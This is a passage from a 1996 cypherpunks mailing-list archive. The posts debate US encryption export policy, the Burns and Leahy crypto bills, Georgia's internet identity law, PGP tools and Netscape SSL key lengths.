standards promotion power of the National Institute of Standards and
Technology (NIST) to serve the narrow interests of the NSA as compared to
the broader interest of Internet users and US businesses.  These
"key-escrow" proposals, known as Clipper and Clipper II, have met with
stiff resistance from civil libertarians, Internet users, and the US
computer and communications industries.

While legitimate law enforcement and national security issues are important
factors in this debate, the need for individual privacy and security for
personal and commercial communications and data is vital to the future of
the Internet and other interactive communications technologies.  As a
result, the outcome of this policy debate will have tremendous implications
on your privacy and the future of the Internet.

------------------------------------------------------------------------------
FOR MORE INFORMATION ON THIS ISSUE

For more information on the Encryption Policy Debate, please visit CDT's
encryption policy issues page at

 http://www.cdt.org/crypto/

You can also join CDT, VTW, EFF, EPIC, People for the American Way, Wired
Magazine, and others in an online campaign to promote secure communications
online.  For more information, visit:

* The Encryption Policy Resource Page  --   http://www.crypto.com/
* The Internet Privacy Coalition Page  --   http://www.privacy.org/ipc
* EFF's Crypto Page                    --   http://www.eff.org/
* EPIC's Crypto Page                   --   http://www.epic.org/crypto
* VTW's Crypto Page                    --   http://www.vtw.org/

-----------------------------------------------------------------------
(3) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.15                                           5/2/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 3 May 1996 12:58:15 +0800
To: cypherpunks@toad.com
Subject: proposed anti-pseudospoofing law in Georgia
Message-ID: <199605021952.MAA18471@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


this law got a little notice here although I didn't notice people
considering its identity aspects in particular.

this proposed law in Georgia 
would make it illegal to have a login name other than 
your legal name, as I understand it.

I consider it rather silly, naive, and unenforcable, 
but it does suggest a few things:

1. lawmakers are starting to notice the internet bigtime.
2. its starting to freak them out.
3. the identity issues raised by cyberspace have significant 
social implications and will not go away quietly.
4. there are some legitimate reasons to require ID in some places
in cyberspace.

of course I will be flamed on 4, but my position is, has always
been the following: both anonymous and "identified" communication
have their places. I am not suggesting that either one is superior
a priori.  however each has different uses. some things that
are possible in one are not possible in the other, etc.

I think it is reasonable
for people who create/maintain forums or other cyberspace services
to demand, and be able to enforce, that you use your real 
identity if they choose. likewise, you are free not to join these
place or use these services. I think anyone should be free
to create alternatives that spit in the face of these restrictions.
let the market decide what is most viable in given situations.

I suspect that we are going to see some laws being passed trying
to regulate cyberspace that are really ridiculous. it will take
the lawmakers awhile to figure out what they can and can't get away with
and when their opinions are or are not relevant to what happens.

meanwhile, if the internet really is robust, their irrelevant
posturings should not make much difference, although I am *not* 
advocating that people resign themselves to these laws, only that
if they pass the situation is not necessarily catastrophic or
apocalyptic.


------- Forwarded Message


- ------- Forwarded Message

Date:      Tue, 30 Apr 1996 11:31:52 -0400 (EDT)
From: merkaba@styx.ios.com
Reply-To: snetnews@xbn.shore.net
To: Multiple recipients of list SNETNEWS <SNETNEWS@XBN.SHORE.NET>
Subject:   INTERNET POLICE (fwd)




- - ---------- Forwarded message ----------
Date: Fri, 26 Apr 1996 21:44:53 -0400
From: Ronald Pearce <ronald@cybercomm.net>
To: merkaba@styx.ios.com
Subject: INTERNET POLICE

>
>It is being dubbed the Internet Police Law.  Georgia's state government is
>beginning to catch a little net-heat because of a new law signed by the
>Governor last week which, according to some, CRIMINALIZES the use of e-mail
>addresses which don't properly identify a person, as well as the practice of
>linking to another web page by name without first obtaining permission to
>link.  
>
>If anyone cares to see information and commentary on this new law, feel free
>to browse over to www.kuesterlaw.com.  I would love to know what everyone
>thinks about the constitutionality of this bill, as well as any other comments.
>
>Thanks.
>jk
>Jeffrey R. Kuester, Esq.         Patent, Copyright, & Trademark Law
>6445 Powers Ferry Road, Suite 230, Atlanta, Georgia 30339
>Ph (770) 951-2623  Fax (770) 612-9713
>E-mail: kuester@kuesterlaw.com
>WWW: http://www.KUESTERLAW.com   (The Technology Law Resource)
>
>---------------------------------------------------------------




- - ->   SNETNEWS Mailing List & Fidonet Echo
- - ->   Post to:  listserv@xbn.shore.net    
- - ->             subscribe snetnews        



- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 3 May 1996 12:46:17 +0800
To: cypherpunks@toad.com
Subject: Re: [Linux] Unix plugins for Netscape (Was: Calling other code in Java applications and applets)
Message-ID: <2.2.32.19960502195251.00c80164@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:45 AM 5/2/96 -0700, Ian Goldberg wrote:

>I'd venture a guess that most people who have a Linux box sufficiently cool
>to run netscape at all, have the ability to run ELF.  In fact, there are
>probably a lot of people (like everyone who bought Slackware 3.0 or a recent
>RedHat) for which netscape is the _only_ a.out binary on their system.

In order to run any of the recient kernels you HAVE to be running ELF.  (Or
have your copy of GCC upgraded to 2.7.0 or higher.)  The docs make no
mention of it, but it barfs on the make if you do not have it.  (There are
three flags that are not supported under the old versions of GCC.)

>   - Ian "Add me to the 'Make an ELF Linux binary!!!' list..."

Are they keeping a list?  As for Linux, last I heard it was still on the
semi-supported list.  (The dropping of BSD on the fasttrack server pisses me
off as well, but that is another matter...)  I would like to get a version
of the Linux binary that supports 128 bit SSL. (As well as the ELF binaries.)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com
Date: Fri, 3 May 1996 09:58:10 +0800
To: cypherpunks@toad.com
Subject: KEY_lok
Message-ID: <199605021653.MAA12641@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-2-96 FiTi reports at length on its investigation of a $19
   million fraud and conspiracy involving smart cards using
   the Fiat-Shamir algorithm for encrypting UK video.

   Most of the detailed, complicated report is about the
   financial and tax-evasive shenanigan's of firms jointly
   providing the cards to BSkyB sat-tv.

   Adi Shamir's work is featured but he does not appear to be
   at fault, although a central role was played by News Data
   Security Products (10% owned by Shamir). 

   The report does not get into the technology of crypto, but
   shows its keylock appeal for criminal conspiracies.

   KEY_lok










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 3 May 1996 10:18:48 +0800
To: Moltar Ramone <jlasser@rwd.goucher.edu>
Subject: [getting off topic] Re: Freedom and security
In-Reply-To: <Pine.SUN.3.91.960501103659.28824B-100000@rwd.goucher.edu>
Message-ID: <Pine.BSF.3.91.960502123659.8410F-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 May 1996, Moltar Ramone wrote:

> On Tue, 30 Apr 1996 angels@wavenet.com wrote:
> 
> > The Internet is beyond the stage of small communities exercising informal
> > social controls (peer pressure).
> 
I disagree. It is your community, and your involvement can still make a 
difference. When all you do is turn away, or complain to the authorities, 
rather than becomming involved, the "crime rate" goes up, and the 
authorities respond by raising taxes, passing laws, and putting more 
police on the streets.

Most spammers just don't know any better. One of the sites I manage 
started choking on spam that was a "mailing list" of a few hundred email 
addresses in the "cc:" field. A polite email message to the offender, and 
another to their ISP, was all that was needed to stop the problem. Took 
much less time than reading this thread.  :)

> Disagree strongly. The net is a LARGE number of SMALL communities. This 
> is why spammers are so offensive: they trespass and violate boundries. 
> This is why killfiles were invented. You ask about people who don't know 
> about killfiles.  Teach them. This requires no formal organization.
> 
> > paradise.  Does anyone really doubt the extent of State control and power
> > across the Net?
> 
> Yes.  If there was state control of the Internet, there probably wouldn't 
> be any anonymous remailers. And the Cyberangels would go away.
> 

I doubt this. One can still get a "blind" post office box rather easily. 
Why would the 'net be any different?

> > My point is that this is inevitable.
> 
> Very few things are inevitable; that's a very strong word. The Cypherpunk 
> Agenda is to provide exactly those tools which make this "inevitable" 
> thing absolutely impossible.
>
You're taking a stand on the minority side of a viewpoint; society can, 
and might, fight back by making your tools themselves illegal, rather 
than the uses you put them to. At least in the U.S., you can fall back on 
the Bill of Rights, but the CDA is a prime example of the erosian of even 
our most fundamental protection.
 
> > The Internet is a
> > mirror of the rest of the world, not a new form of society, and I fail to
> > understand why anyone should be surprised that that is the case.
> 
> Disagree modestly.
> 
> > I disagree with this statement. I do not believe that laws breed more laws
> > nor that laws lead to less freedom.  I believe bad laws compromise freedom
> > (eg CDA) while good laws protect freedom.
> 
The problem is that we're running a bit short on the "good laws" side, at 
least here in the U.S. Election-year stupidity has again set in, and our 
(mostly uninformed) leaders are racing to anything involving regulation 
of the 'net, as it's a sure way to get into the public eye. Take the 
"minor bit" as an example of a hasty and ill-thought-out p.r. stunt ...

> Have you taken a good hard _honest_ look at the War on Drugs? I also 
> believe that bad laws compromise freedom and good laws protect freedom. 
> One of the problems is that good laws often breed bad laws to patch 
> things up.
> 
> > Cryptography enhances and protects privacy, which does not inevitably lead
> > to greater security.  Security for the sender, yes, in that no one else can
> > read the message, but security for the Community?  Doesnt that depend what
> > the message said?
> 
If I send snail, there are "rules" governing who can open the envelope. 
If I'm suspected of criminal activity, the community has recourse.

The 'net is different. The envelope is always open. I suppose this falls 
right into the trap of giving the govt. key escrow, which I'm against, 
but that's another story ...

> No. True security for the community rests in a shared social standard 
> which discourages actions which are harmful to the community or 
> individuals. Security which requires a class of Guardians to protect 
> everyone else is not security. It's safety, but it's temporary safety.
> Jon Lasser
> ----------
> Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
> jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
> http://www.goucher.edu/~jlasser/
> Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 3 May 1996 10:26:11 +0800
To: cypherpunks@toad.com
Subject: Re: [getting off topic] Re: Freedom and security
In-Reply-To: <Pine.BSF.3.91.960502123659.8410F-100000@mcfeely.bsfs.org>
Message-ID: <3188FCD2.3885@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat wrote:

> If I send snail, there are "rules" governing who can open the envelope.
> If I'm suspected of criminal activity, the community has recourse.

If you don't encrypt or otherwise secure sensitive surface mail the same 
way you would e-mail, you deserve what you get.  The community, of course,
is in the same state with secure snail-mail case as it is with PGP-encrypted
e-mail.

Which reminds me of something I've been meaning to ask about.  I read
(probably in WiReD) about a bar-code-like (well, not *much* like, but
ink-on-paper similar) technique for rendering data onto paper with
enhanced properties of storage efficiency, resistance to degradation
through photocopying, and ease of recovery via ordinary scanning.  The
stuff looks like bunches of little lines at different angles, I think.
Anyway, what I'm curious about is whether encode/decode (i.e., print
and scan) software is available.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Fri, 3 May 1996 15:26:10 +0800
To: cypherpunks@toad.com
Subject: Re: EET on PGP API Quash
Message-ID: <v02140b03adaed70f48e8@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


>   ... the State Department is taking
>   an increasingly hard line on PGP. Where once the State had
>   restricted itself to warning developers against exporting
>   source code with PGP file-encryption routines, it is now
>   arguing that application programming interfaces (API)
>   allowing PGP program insertion should be subject to control
>   under arms-trading statutes.

It would seem that any computer system that permits the use
of an externally-supplied computer program (i.e., Windows,
DOS, MacOS, Unix, Java, Microsoft Word macro languange) would
fall under this restriction.

I wonder how much thought went into this decision.

Martin Minow








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com
Date: Fri, 3 May 1996 12:32:36 +0800
To: cypherpunks@toad.com
Subject: EET on PGP API Quash
Message-ID: <199605021908.PAA29631@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   [Thanks to BC]
   
   Electronic Engineering Times, April 29, 1996, page 4

   State Dept. Tries To Quash API's for PGP cryptography

   By Loring Wirbel


   Washington -- The Justice Department may have halted
   attempts to bring criminal charges against Phil Zimmermann,
   author of the Pretty Good Privacy (PGP) public-key
   cryptography algorithms, but the State Department is taking
   an increasingly hard line on PGP. Where once the State had
   restricted itself to warning developers against exporting
   source code with PGP file-encryption routines, it is now
   arguing that application programming interfaces (API)
   allowing PGP program insertion should be subject to control
   under arms-trading statutes.

   Warning letters sent out in the last few weeks reflect the
   bizarre status of cryptography algorithms in the
   government's Export Control Act. Under the International
   Traffic in Arms Regulations (ITAR) promulgated under the
   act, the government can restrict any encryption programs
   the National Security Agency (NSA) is uncomfortable with.
   The new moves represent the first time State has tried to
   extend ITAR to software that only provides hooks for
   encryption packages, however.

   "There is some room to maneuver and make strong arguments
   that the rules on crypto APIs have some serious
   ambiquities," said Kenneth Bass, an attorney specializing
   in export control with the Washington law firm of Venable
   Attorneys at Law. Bass said several companies have received
   warning letters from State, but most do not want to do
   battle with the Federal government.

   Meanwhile, wildly differing rulings in the U.S. District
   Courts on the West and East coasts send mixed messages
   about software embedding crypto algorithms. In refusing to
   dismiss developer Daniel Bernstein's suit against the State
   Department, Judge Marilyn Hall Patel of San Francisco ruled
   in early April that source code can be protected free
   speech.

   "The particular language one chooses  does not  change the
   nature of the language for First Amendment purposes," Patel
   said. "This court can find no meaningful difference between
   computer languages ... and German or French; ... whether
   source code or object code is also functional is
   immaterial." Bernstein seeks to establish that his
   zero-delay private-key program, Snuffle, is not subject to
   ITAR.

   Opposite Rationale

   But on March 22, Judge Charles Richey of Washington
   dismissed Philip Karn's suit against State using almost
   exactly the opposite rationale. Karn, an employee of
   Qualcomm Inc. (San Diego), challenged a ruling that the
   floppy disks accompanying some editions of Bruce Schneier's
   book, *Applied Cryptography*, could be barred from export.

   Judge Richey said the government was free to view
   implemented source code as a munition that could be banned,
   and said Defense Department decisions regarding materials
   covered under export control were precluded from judicial
   review. Karn appealed to the U.S. Circuit Court of Appeals
   on April 19. "The stage is being set for some very basic
   issues on souce code and free speech to be decided," said
   attorney Bass.

   So far the API issue has not spurred any suits. Network
   Telesystems Inc. (Santa Clara, Calif.) a TCP/IP stack
   specialist and the one company that has admitted receiving
   a warning from State, said that a PGP API is not central
   enough to its business to warrant making its preservation
   a federal case.

   Company president John Davidson said Network Telesystems
   elected to make its new e-mail package, Confidante, "PGP
   ready" by including a PGP API instead of licensing the
   code. Davidson said the warning must have been the result
   of government officials seeing the press release on the
   package, which has not yet shipped, or a short article in
   a national magazine.

   "We thought it was a misunderstanding at first, since we
   had no resident PGP code," Davidson said. "It didn't seem
   possible that the government could really be talking about
   an interface."

   One computer-security expert said off the record that "NSA
   has told State to watch out for any APIs outside NSA's own
   effort to define a crypto API." NSA is embracing the API
   work of companies like RSA Data Security Inc., the source
   said, "but Zimmermann's PGP work has always been a
   freelance effort, so a compromise is not seen as
   necessary."

   -----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Shabbir J. Safdar" <shabbir@vtw.org>
Date: Fri, 3 May 1996 13:57:02 +0800
To: cypherpunks@toad.com
Subject: VTW: Senate attacks Clinton encryption export policy
Message-ID: <199605021909.PAA09024@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


========================================================================
__     _________        __	
\ \   / /_   _\ \      / /	Voters Telecommunications Watch
 \ \ / /  | |  \ \ /\ / / 	        (vtw@vtw.org)
  \ V /   | |   \ V  V /  		 May 2, 1996
   \_/    |_|    \_/\_/   	Redistribute only until 5/28/96

	SENATORS FIRE BROADSIDE SALVO AT CLINTON ADMINISTRATION'S
	    HEINOUS AND ANTIQUATED ENCRYPTION EXPORT POLICIES

      Please widely redistribute this document with this banner intact
			    until May 28, 1996
________________________________________________________________________
CONTENTS
	The Latest News
	Chronology of the 1996 Crypto Bills
	For More Information

________________________________________________________________________
THE LATEST NEWS

Today, a core contingent of the US Senate proposed legislation that
would free public domain software such as Phil Zimmerman's PGP (Pretty
Good Privacy), allow for the export of products that have competitive
encryption abroad, and limit the government's ability to propose
another Clipper-style standard.

The latest proposal, sponsored by Sen. Burns (R-MT) is the third in a series
of bills this year that blatantly attack the Clinton Administration's
policies of restricting the export of encryption that is already found
outside the United States.  Text of the legislation is now available on
http://www.crypto.com/ and http://www.vtw.org/ as soon as we get it.

In another bold move, Senators Conrad Burns (R-MT) and Patrick Leahy (D-VT)
have scheduled online chats to discuss this legislation with the people
who understand the issue the best: the net community.  As a part of
the Whistlestop96 campaign by VTW and CDT (Center for Democracy and
Technology) to bring members of Congress in touch with the net community 
during the 1996 campaigns, Senators Burns and Leahy will be attending
live online chat sessions on HotWired and America Online.  The schedule
as currently available is:

Sen. Burns
	America Online, News Room auditorium: Monday May 6, 9pm EST
	Hotwired: Monday May 13, 9pm EST

Sen. Leahy
	America Online: date not yet available
	Hotwired: date not yet available

In addition, volunteers have begun maintaining a resource page at
http://www.crypto.com/ with a corresponding mailing list for encryption
policy news.  You can subscribe to it from the WWW page http://www.crypto.com/
or by sending mail to majordomo@panix.com.

________________________________________________________________________
CHRONOLOGY OF THE 1996 ENCRYPTION BILLS

May 2, '96	Bi-partisan group of Senators introduce PRO-CODE Act, which
		would free public-domain encryption software (such as PGP)
		for export, free much commercial encryption for export, and
		reduce the government's ability to push Clipper proposals
		down the throats of an unwilling public.  Original sponsors
		include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC),
		Leahy (D-VT), Murray (D-WA), Nickles (R-OK), Pressler (R-SD),
		and Wyden (D-OR).

Mar 5, '96	Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) introduce
		bills to liberalize cryptography exports.  Cosponsoring
		this legislation on the Senate side at Sen. Burns (R-MT)
		and Sen. Murray (D-WA).  On the House side are the
		following cosponsors:  DeLay, Campbell, Eshoo, Moorhead,
		Doolittle, Barr, Ewing, Mica, Everett, Bono, Lofgren, and
		McKeon.

________________________________________________________________________
FOR MORE INFORMATION ABOUT ENCRYPTION

Encryption Policy Resource Page: http://www.crypto.com/
Voters Telecommunications Watch: http://www.vtw.org/ 
Internet Privacy Coalition: http://www.privacy.org/

========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Fri, 3 May 1996 14:07:21 +0800
To: cypherpunks@toad.com
Subject: Re: proposed anti-pseudospoofing law in Georgia
Message-ID: <2.2.32.19960502222125.007306a0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 PM 5/2/96 -0700, "Vladimir Z. Nuri" <vznuri@netcom.com> wrote:
[snip]
>this proposed law in Georgia 
>would make it illegal to have a login name other than 
>your legal name, as I understand it.
[snip]

More than proposed.  It was signed by Gov. Zell Miller on April 18, and is
now the law in GA.

see http://www.clark.net/pub/rothman/ga.htm
and http://www.gahouse.com/docs/whatsnew/parsons.htm


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Fri, 3 May 1996 13:41:53 +0800
To: cypherpunks@toad.com
Subject: Announce: Windows PGP QuickStart
Message-ID: <199605022225.PAA27781@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Due to a fair amount of demand from Private Idaho users who had novice
friends that
wanted to use PGP, but were frustrated at the installation and configuration
process
of the DOS version, I wrote a Windows utility called PGP QuickStart.

This is an extremely simple app that handholds the user from downloading PGP
with
their Web browser to creating their key rings.  It automatically unzips the
files, creates
the appropriate directory, and modifies the AUTOEXEC.BAT file.  The user
just follows
easy to understand dialog boxes and clicks buttons.

This is not a full-featured front-end.  Its purpose is only to simplify the
PGP installation
process so a user can later use Private Idaho or any of the other Windows
shells that are available.

Obviously, most people on the list aren't going to have much personal use
for this app.
However, it is perfect for recommending to PC users who want to get started with
crypto, but may be a little bit intimidated.

The beta version is located at:

http://www.eskimo.com/~joelm/pi.html

Comments to: joelm@eskimo.com

As with Private Idaho, this utility is free...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 3 May 1996 13:54:49 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.15 - Legislation Challenges Clinton's Grip on US Crypto Policy
Message-ID: <m0uF6pH-00094OC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>  The Center for Democracy and Technology   Volume 2, Number 15
>Among other things, the "Pro-CODE" would:
>* Allow the export of "generally available" or "public domain"
>  encryption software such as PGP and popular World Wide Web browsers
>  without requiring NSA authority.
>
>* Allow the export of encryption hardware and software not available in
>  the "mass market" or "public domain" under an export scheme that would
>  allow up to roughly DES-strength (i.e., 56 bit key-length) security.
>  if a product of similar strength is commercially available from a
>  foreign supplier

What, exactly, is the point of such a provision that would limit key length? 
 Since the classifications of encryption export software seem to allow any 
keylength, why should there be an 
exception for others?  I think they should give specific examples of 
hardware or software whose export would not be allowed, and more 
particularly an explanation why an exception is needed in those cases.  

We really need to know what they're thinking about, here.  It isn't obvious 
why, and generally I've found that whenever laws carve out exceptions, there 
are substantial reasons for those exceptions, although not necessarily 
"good" reasons.  

Notice, for example, that there appears to be a distinction between hardware 
and software. (although, in the bill, it does list both hardware and 
software.)    As we all should understand, the distinction ought to be 
meaningless, but one of our goals should be to allow the unrestricted export 
of good-encryption telephones which have their encryption done  in hardware. 
 That doesn't appear to be the case, and I think this is a telling 
limitation.  The law will practically guarantee that no factories to build 
good crypto phones get sited in the US.

However, a look at the actual bill shows nothing which specifically limits 
things to 56-bit keys, although it seems to make an unusual distinction, 
allowing exports "in any foregin country to which those exports of computers 
software and computer hardware of similar capability are permitted for use 
by financial institutions..."  The problem, as I see it, is that this is 
practically an open invitation to foreign countries to pass laws which are 
specifically intended to restrict encryption.  We should not be encouraging 
them to do this.  Some explanation is definitely in order!

BTW, that brings us to another issue:  The bill should specifically prohibit 
restrictions on the IMPORTATION of any kind of encryption systems, either 
hardware and software.


>* Prohibit the government from imposing mandatory key-escrow encryption
>  schemes domestically, or from restricting the sale of commercial
>  encryption products within the United States

Redundant.  The 1st amendment should already do this.  I have no objection 
to them re-stating Constitutional protections, but it should label them as 
such.

>* Prohibit the Department of Commerce from imposing government designed
>  standards for encryption technologies (such as Clipper and Clipper
>  II).

Ditto.  But more importantly, I think it ought to be prohibited from even 
_encouraging_ the use of such systems, which as we all know the government 
can do by abusing its power.  It should be prohibited from spending any 
money to develop those standards, as well as prohibiting government from 
encouraging the use of those standards, etc.

All in all, a substantial improvement over the Leahy bill, but it could 
still use a little work.

Jim Bell
jimbell@pacifier.com
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 3 May 1996 14:28:27 +0800
To: cypherpunks@toad.com
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
Message-ID: <199605022252.PAA01524@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:55 AM 5/2/96 -0700, Ian Goldberg wrote:
>Bill Frantz <frantz@netcom.com> wrote:
>>As far as I know, DES is DES, domestic or export.  If your DES
>>interoperates with domestic DES (or popular implementations available on
>>non-US servers), then you have DES.
>
>Not quite.  CDMF key shortening was designed by IBM to shrink a 56-bit DES
>key to 40 bits, suitable for export.  See AC2, page 366.  I heard a rumour
>that CDMF is in SET, but I'm not sure how much that makes sense.

I can find no evidence in Draft 2/23/96 of SET for 40bit DES keys.  (BTW, I
would not call CDMF DES, but this may be merely quibbling.)  On page 31, it
says, "The DES key format follows FIPS 46: it contains 56 bits of keying
material and eight optional check bits."

Since SET is very careful to not deal with anything but the financial
aspects of online commerce, they can probably get a license for export
under the current rules.  (SET only includes a SHA hash of the "contract",
calculated by both the cardholder and the merchant in its encrypted
content.  Both versions must match for the transaction to be authorized.)

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 3 May 1996 15:14:43 +0800
To: cypherpunks@toad.com
Subject: Burns Bill
Message-ID: <199605022252.PAA01532@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A quick read thru the text of the bill (via http://www.cdt.org/crypto/)
shows none of the principle objectionable features of the Lehey bill. 
(Standards for key escrow agents, and additional criminal penalties for
using encryption to hinder an investigation.)

This bill has some obscure, to me, exceptions.  The most troubling of which
I think means (IANAL) that export can be restricted if there is a
reasonable expectation that the hard/software will be reexported to one of
the countries on the extreme bad boys list.  This provision could possibly
be construed to affect FTP sites, but in any case, it is not clear how
passage of the bill could possibly make things worse.

Its provisions preventing the Secretary of Commerce from developing
standards for anyone except government agencies, and forbidding mandatory
GAK/key escrow are very welcome.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <brucem@wichita.fn.net>
Date: Fri, 3 May 1996 14:20:57 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
In-Reply-To: <5y40mD297w165w@bwalk.dm.com>
Message-ID: <Pine.BSI.3.91.960502164239.17010C-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 May 1996, Dr. Dimitri Vulis wrote:

> My recollection is that when IBM first started selling IBM PC, they offered
> a choice of (at least) 3 operating systems right from the start: UCSD p-system,
> CP/M-86 or PC-DOS.  IBM didn't do anything to prompte PC-DOS over the other
> two. It won fair and square in the marketplace because the other two were
> even worse crap. (Later versions of CP/M-86 got much better.)

    I always had been under the impression that they charged a hundred 
dollars or more for CPM as opposed to DOS which was also a major reason 
for its popularity.

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 3 May 1996 13:21:49 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: [Linux] Unix plugins for Netscape (Was: Calling other code
In-Reply-To: <2.2.32.19960502195251.00c80164@mail.teleport.com>
Message-ID: <199605022050.QAA15445@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen writes:

>                                              I would like to get a version
> of the Linux binary that supports 128 bit SSL. (As well as the ELF binaries.)

I got a 128bit copy of Netscape 2.0 for Unix a few weeks ago (yes,
all the Unix versions come on one CDROM).  Under the Linux directory,
there was no executable but there was a README file claiming that
there is a 128bit version available from one of the Linux-associated
vendors (Caldera I think?).  I haven't followed up on it, and don't
have a CDROM drive available right now to check this.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rodger@interramp.com (Will Rodger)
Date: Fri, 3 May 1996 13:30:26 +0800
To: cypherpunks@toad.com
Subject: Sen. Patrick Leahy's PGP key now avail.
Message-ID: <v01510101adaea22996f6@[38.12.5.30]>
MIME-Version: 1.0
Content-Type: text/plain


Wanna write the good Senator on the occasion of his newest bill? His pub
key's out there. (URL is  http://bs.mit.edu:8001/pks-commands.html#submit/
)

Will Rodger






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 3 May 1996 16:18:42 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Patrick Leahy's PGP key now avail.
Message-ID: <adaea4ac18021004fc68@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:36 PM 5/2/96, Will Rodger wrote:
>Wanna write the good Senator on the occasion of his newest bill? His pub
>key's out there. (URL is  http://bs.mit.edu:8001/pks-commands.html#submit/
>)

Why does anyone need his public key to communicate with Senator Leahy? If
it's for sender-anonymity, this does not do it, though other tools
(remailers) do.

Unless the information is "secret," why bother? It adds extra time at his
office's end (you don't think Leahy types in his password to PGP do you?),
and it accomplishes little.

>From a personal viewpoint, I'm glad my key is no longer very accessible. I
used to get PGP-encrypted messages which had no earthly reason to be
